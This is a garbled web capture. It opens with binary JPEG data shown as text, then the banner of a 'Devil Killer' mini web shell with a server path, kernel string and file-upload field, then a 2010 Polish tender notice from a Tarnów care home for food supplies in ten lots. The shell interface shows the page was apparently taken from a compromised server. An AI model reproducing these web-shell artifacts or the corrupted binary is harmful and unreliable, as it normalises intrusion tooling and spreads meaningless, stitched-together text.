JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101130/389808-N-2010.html

<p class="kh_header"><b>Tarnów: Dostawa  żywności dla potrzeb zbiorowego żywienia osób przebywających w DPS</b><br>
<b>Numer ogłoszenia: 389808 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Osób Przewlekle Somatycznie Chorych im. świętego Brata Alberta w Tarnowie , ul. Szpitalna 53, 33-100 Tarnów, woj. małopolskie, tel. 0-14 6888-667, 6888-668, faks 0-14 6888-666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.okay.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa Gminy Miasta Tarnowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  żywności dla potrzeb zbiorowego żywienia osób przebywających w DPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  żywności dla potrzeb zbiorowego żywienia osób przebywających w DPS.
Symbol dostaw wg Wspólnego Słownika Zamówień: 
wg CPV:03142500, 03212100, 03311000, 15100000,15500000, 15800000
W celu umożliwienia  składania ofert częściowych Zamawiający ustalił niżej wymienione zadania:
Zadanie nr 1		- Mąki i kasze
Zadanie nr 2		- Pieczywo świeże
Zadanie nr 3		- Przyprawy i używki, 
Zadanie nr 4		- Pozostałe produkty spożywcze
Zadanie nr 5		- Mleko i produkty mleczarskie
Zadanie nr 6		- Drób i podroby.
Zadanie nr 7		- Mięso , wędliny i wyroby drobiowe
Zadanie nr 8		- Ryby i produkty rybne
Zadanie nr 9		- Warzywa i owoce
Zadanie nr 10		- Jajka

Definicje:
-  Mąki i kasze- produkty suche, niezawilgocone, bez obecności szkodników/chrząszcze, larwy motyli/, opakowania nieuszkodzone. Opakowania jednostkowe 1 kg. Termin ważności w dniu dostawy minimum 2 miesiące. Wykonawca odpowiada za  odpowiednie warunki transportu.
-	Pieczywo świeże-wyroby o odpowiedniej barwie charakterystycznej dla
   upieczonego pieczywa,  kształcie, smaku i wymaganej gramaturze. Zachowane odpowiednie warunki transportu. Do każdej dostawy należy dołączyć wykaz zawierający rodzaj pieczywa, wagę, skład surowcowy i datę przydatności do spożycia.
-  Przyprawy i używki-produkty suche, niezawilgocone, opakowania nieuszkodzone. Termin ważności w dniu dostawy minimum 2 miesiące. Zachowane odpowiednie warunki transportu.
-  Pozostałe produkty spożywcze- opakowania produktów, czyste, nieuszkodzone, bez oznak bombażu. Zachowane terminy ważności i odpowiednie warunki transportu.
-  Mleko i produkty mleczarskie- wyroby świeże o odpowiednim smaku i zapachu. Opakowania czyste nieuszkodzone. Zachowana wymagana gramatura, terminy ważności i odpowiednie warunki transportu.
-  Drób i podroby świeże- produkty o odpowiednim zapachu mięsa świeżego, bez zanieczyszczeń, nalotu pleśni i zazielenienia mięsa. Zachowane odpowiednie warunki transportu.
-  Mięso, wędliny i wyroby drobiowe świeże -produkty o odpowiednim naturalnym zapachu mięsa świeżego, bez zanieczyszczeń, nalotu pleśni i zazielenienia mięsa. Zachowane odpowiednie warunki transportu.
-  Ryby i produkty rybne- wyroby mrożone w odpowiednich opakowaniach. Wyroby w puszkach    
   bez oznak bombażu o odpowiednim terminie ważności i odpowiednich warunkach transportu.
-  Warzywa i owoce-produkty świeże(w okresie sezonowym) dojrzałe, czyste, nieuszkodzone. Bez  oznak pleśni, zepsucia i zanieczyszczeń. Zachowane odpowiednie warunki transportu.
-  Jaja świeże -klasa A , rozmiar L, gramatura 63-73 g o podłużnym kształcie, czyste, nieuszkodzone. O odpowiednim terminie ważności nie krótszym niż 14 dni i odpowiednich warunkach transportu.
Jakość dostarczanego towaru powinna odpowiadać ogólnie przyjętym normom  w tym zakresie             z zastrzeżeniem art. 357 ustawy Kodeks Cywilny.
Zarówno przedmiot jak i zakres zamówienia określony jest w Specyfikacji Istotnych Warunków Zamówienia w postaci Formularza Cenowego /załącznik nr 1do nr 10 do siwz/, który określa  roczne potrzeby asortymentowo - ilościowe  Zamawiającego.
Zamawiający nie jest zobowiązany do zamówienia  podanych w załączniku  ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy. 
Dostawy przedmiotu zamówienia w poszczególnych okresach czasu muszą być realizowane    wg. odrębnych zamówień dokonywanych przez Zamawiającego telefonicznie, fax lub e-mail   na jeden dzień roboczy przed planowaną dostawą.
Terminarz dostaw:
Dostawy towarów poszczególnych zadań muszą odbywać się w wyznaczonych godzinach. 
Zadanie nr 1 - Mąki i kasze		-dostawy 2 razy w tygodniu tj wtorek,czwartek w godz.700-1000
Zadanie nr 2 - Pieczywo świeże		-dostawy 6 razy w tygodniu (od poniedziałku do soboty) w godz.7-730
Zadanie nr 3 - Przyprawy i używki	-dostawy 2 razy w tygodniu tj.wtorek,czwartek w godz.700-1000
Zadanie nr 4 - Pozostałe produkty spożywcze -dostawy 2 razy w tygodniu tj. wtorek, czwartek w godz.700-1000
Zadanie nr 5 - Mleko i produkty mleczarskie	-dostawy 6 razy w tygodniu (od poniedziałku do soboty) w godz.700-730
Zadanie nr 6 - Drób i podroby.			-dostawy 3 razy w tygodniu tj. poniedziałek, środa, piątek  w godz.700-1000
Zadanie nr 7 - Mięso , wędliny i wyroby drobiowe -dostawy 3 razy w tygodniu  tj. poniedziałek, środa, piątek w godz.700-1000	
Zadanie nr 8 - Ryby i produkty rybne	-dostawy 2 razy w tygodniu tj. wtorek, czwartek                     w godz.700-1000
Zadanie nr 9  - Warzywa i owoce		-dostawy 3 razy w tygodniu tj. poniedziałek, środa, piątek w godz.700-1000	
Zadanie nr 10 - Jajka			-dostawy 2 razy w tygodniu tj. wtorek, czwartek                    w godz.700-1000	
Dostawy żywności muszą być realizowane przez Wykonawcę przystosowanym do tego celu transportem i w opakowaniach Wykonawcy do magazynu Zamawiającego. 
Zwrotne opakowania winny być oznakowane przez Wykonawcę.
Opakowania transportowe środków spożywczych powinny być wykonane z materiałów, które nie powodują zmiany cech organoleptycznych środków spożywczych, są łatwe do utrzymania                                w czystości oraz zapewniają środkom spożywczym odpowiednie warunki   w czasie przewozu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 03.21.21.00-1, 03.31.10.00-2, 15.10.00.00-9, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tych warunków nastąpi poprzez komisyjne porównanie oferty z wymaganiami w siwz i odnotowaniem w protokole z postępowania czy oferta spełnia lub nie spełnia wymagania siwz. Potwierdzeniem spełniania będą: dokumenty określone w p. VI SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ma wymagania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ma wymagania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty niezbędne do zawarcia umowy, tj. kserokopia wypisu z rejestru części potwierdzającej umocowanie osób do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana cen mozliwa będzie tylko w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.okay.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, p. 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2010 godzina 12:00, miejsce: w siedzibie Zamawiającego, p. 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mąki i kasze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	2	3	4	5
1	Kasza gryczana	156	Kg 	100
2	Kasza gryczana /100g x 4/	156	Kg 	5
3	Kasza jęczmienna	156	kg.	300
4	Kasza jęczmienna/100g x 4/	156	Kg 	5
5	Kasza manna	156	Kg 	100
6	Mąka kartoflana	156	kg.	120
7	Mąka krupczatka	156	kg.	50
8	Mąka pszenna  poznańska typ.500	156	kg.	1 700
9	Płatki kukurydziane 1000g	156	kg.	90
10	Płatki owsiane	156	kg.	270
11	Płatki zbożowe z miodem 250g	156	Kg 	50
12	Ryż  /100g x 4/	156	kg.	70
13	Ryż brązowy 	156	Kg 	100
14	Ryż brązowy/100g x 4/	156	Kg 	5
15	Ryż długoziarnisty kl.I	156	kg.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Bułka tarta	158	kg.	200
2	Bułka zwykła 0,10 kg	158	Szt.	20 400
3	Chałka drożdżowa 0,50kg	158	kg.	300
4	Chleb graham 0,80kg niekrojony	158	Szt.	3 300
5	Chleb pszenno-żytni 1,20kg niekrojony	158	Szt.	4 200
6	Chleb pszenny  1,20kg niekrojony	158	Szt.	3 400
7	Ciastka kruche mieszane na wagę	158	Kg 	25
8	Ciastka przekładane z masą na wagę	158	Kg 	25
9	Drożdżówka z kakao 100g	158	Szt.	560
10	Drożdżówki z ciasta francuskiego              z serem100g	158	Szt 	1 000
11	Drożdżówki ze serem 100g	158	Szt.	1 400
12	Groszek ptysiowy	158	Kg 	1
13	Murzynek z polewą czekoladową	158	Kg 	60
14	Pączki z marmoladą100g	158	Szt.	500
15	Rogale z masą czekoladową 100g	158	Szt 	800
16	Rogale z konfiturą z róży 100g	158	Szt 	700
17	Weki 0,4 kg	158	Szt. 	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przyprawy i używki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Bazylia w proszku 10g	158	Szt	20
2	Budyń  b/cukru	158	Kg 	60
3	Bulion drob. w  kostkach 10g	158	Szt	2 200
4	Cukier biały kryształ kt.2	158	kg.	3 900
5	Cukier puder	158	kg.	150
6	Cukier waniliowy 32g	158	Szt.	500
7	Cynamon 20g	158	Szt.	50
8	Czekolada 0% cukru 80g	158	Szt.	100
9	Czekolada mleczna 100g	158	Szt.	400
10	Drożdże w kostkach 	158	kg.	10
11	Gałka muszkatołowa mielona 20g	158	Szt.	30
12	Grzyby suszone -podgrzybek, mieszane	158	kg.	5
13	Herbata ekspresowa w torebkach 100szt  równoważna jak herbata Lipton	158	op.	5
14	Herbata czarna granulowana  równoważna jak herbata Saga	158	kg.	90
15	Imbir  mielony 15g	158	Szt.	40
16	Kakao ekstra ciemne 	158	kg.	20
17	Kawa rozpuszczalna 2g	158	Szt	250
18	Kawa rozpuszczalna /3 w 1/ 18g	158	Szt	270
19	Kawa mielona naturalna 250g	158	Kg 	3
20	Kawa zbożowa rozpuszczalna150g	158	kg.	20
21	Keczup 450g łagodny	158	Kg 	110
22	Kisiel b/cukru	158	Kg 	50
23	Kminek 20g	158	Szt.	90
24	Przyprawa do potraw równoważna jak przyprawa VEGA bez glutaminianu sodu	158	kg.	190
25	Kukurydza konserwowa 400g	158	Szt	140
26	Kwasek cytrynowy 50g	158	Szt.	280
27	Liść laurowy 10 g	158	Szt.	160
28	Przyprawa w płynie do zup równoważna jak przyprawa Winiary	158	L	470
29	Majeranek 10g	158	Szt.	100
30	Majonez 	158	kg.	230
31	Majonez light / niskotłuszczowy/250g	158	Kg 	80
32	Mak 	158	kg.	10
33	Makaron z mąki makaronowej pszennej równoważny jak makaron Lubelski.	158	kg.	820
34	Miód naturalny 25g	031	Szt	4 600
35	Masa krówkowa w puszce 400g	158	Szt	10
36	Musztarda	158	kg.	120
37	Ocet spirytusowy 0,50 l  10%	158	L	60
38	Oregano w proszku 10g	158	Szt	20
39	Papryka mielona słodka 20g	158	Szt.	410
40	Pieprz czarny mielony 20g	158	Szt.	520
41	Proszek do pieczenia 36g	158	Szt.	100
42	Przyprawa curry 20g	158	Szt 	30
43	Przyprawa do drobiu 20g	158	Szt.	50
44	Przyprawa do ryb 25g	158	Szt. 	100
45	Soki owocowe 2 litrowe w kartonach	158	Szt	50
46	Sok pomarańczowy 100% w kartoniku 200ml	158	Szt 	1 050
47	Sól czosnkowa 40g	158	Szt.	400
48	Sól jodowana	158	kg.	230
49	Suchary 290g	158	op.	15
50	Susz owocowy .	158	kg.	6
51	Tzatziki  przyprawa	158	Szt	10
52	Śliwki kalifornijskie wędzone	158	kg.	3
53	Woda mineralna 1,5l gazowana	159	Szt 	110
54	Ziele angielskie 15g	158	Szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pozostałe produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Aromaty do ciast 10g	153	Szt.	110
2	Bita śmietana w proszku 55g	153	Szt.	500
3	Chrzan tarty 180g równoważny jak chrzan/Polonaise/.	153	Kg 	90
4	Dżem bez cukru słodzony fruktozą 220g	153	Kg 	80
5	Dżem owocowy 25g	153	Szt	6 500
6	Dżem  niskosłodzony 280g	153	Kg 	100
7	Fasola szparagowa mrożona	153	kg.	200
8	Galaretka owocowa 	153	Kg 	230
9	Groszek konserwowy 400g	153	Szt	520
10	Kalafior mrożony	153	kg.	600
11	Kompot owocowy 0,9l z czarnej porzeczki lub wiśni	153	Szt.	3 200
12	Koncentrat pomidorowy 30% równoważny jak koncentrat Pudliszki.	153	kg.	200
13	Marmolada wieloowocowa twarda	153	kg.	15
14	Ogórki konserwowe 0,9l	153	Szt	520
15	Olej z pierwszego tłoczenia równoważny jak olej Kujawski.	154	l.	410
16	Oliwa z oliwek	154	l.	3
17	Papryka konserwowa 0,9l	153	Szt	250
18	Pasztet drobiowy  kremowy 131g	151	Szt.	2 400
19	Pieczarki konserwowe 0,8l	153	Szt	150
20	Rodzynki	158	kg.	15
21	Szynka drobiowa mielona 110g	151	Szt.	2 100
22	Szynka wieprzowa mielona 120 g	151	Szt.	900
23	Żelatyna 50g	153	Kg 	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Jogurt naturalny 150g	155	Szt.	3 500
2	Jogurt owocowy 150g	155	Szt.	7 400
3	Kefir 250 ml	155	Szt.	900
4	Margaryna do pieczenia i smażenia równoważna jak Palma Murzynek 250g 	154	kg.	700
5	Masło ekstra świeże 200g zaw.tł . 82% ze śmietanki- bez dodatku tłuszczu roślinnego.	155	kg.	1 320
6	Mleko 2% w op. 10L i 0,9l	155	L	23 000
7	Ser biały półtłusty krajanka	155	kg.	80
8	Ser biały tłusty krajanka	155	kg.	1 800
9	Ser homogenizowany 150g	155	Szt.	4 500
10	Ser topiony 100g	155	Szt.	1 200
11	Ser topiony typu Hochland-trójkątny 25g	155	Szt	3 500
12	Ser żółty /gouda wędzony/	155	kg.	90
13	Ser żółty /gouda/	155	kg.	200
14	Serek typu bieluch 150g	155	Szt.	1 600
15	Serek typu ostrowia 120g	155	Szt.	2 700
16	Śmietana 18%  w kubkach plastikowych	155	kg.	850
17	Śmietana kremowa 30%	155	kg.	40
18	Twarożek ziarnisty 200g	155	Szt.	5 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drób i podroby świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Filet z indyka świeży z mięśnia piersiowego, bez skóry, przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	151	kg.	1 200
2	Filet z kurczaka szacowany świeży cała lub połowa piersi bez skóry, przerostów tłuszczowych, powierzchnia niezakrwawiona,  niepostrzępiona. Barwa mięśni jasnoróżowa.	151	kg.	100
3	Kurczaki świeże całe tusze wypatroszone, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	151	kg.	1 700
4	Udko/noga z kurczaka świeże , kość udowa łącznie z otaczającymi mięśniami, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	151	kg.	1 400
